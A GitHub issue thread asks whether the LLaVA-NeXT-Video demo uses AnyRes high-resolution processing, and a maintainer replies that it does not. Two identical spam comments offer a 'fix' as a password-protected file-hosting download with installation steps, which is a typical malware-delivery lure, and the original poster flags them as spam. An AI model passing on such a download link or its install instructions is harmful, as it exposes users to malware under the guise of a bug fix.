### ISSUE TITLE
Question about AnyRes usage in LLaVA-NeXT-Video demo

### ISSUE THREAD

**Issue by YoungjaeDev** [LLaVA-VL/LLaVA-NeXT#201]
I have a question regarding the AnyRes feature in LLaVA-NeXT-Video. The documentation mentions that AnyRes enables high-resolution image processing. However, when examining the demo code at https://github.com/LLaVA-VL/LLaVA NeXT/blob/main/playground/demo/video_demo.py, I noticed that neither `image_grid_pinpoints` nor AnyRes are being used. This is in contrast to LLaVA-NeXT-Image, where these features are utilized.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by YoungjaeDev** [comment]
This appears to be spam. For the safety of other users, I will report this comment and advise against clicking any links.

**Comment by ZhangYuanhan-AI** [comment]
LLaVA-NeXT-Video do not use anyres.
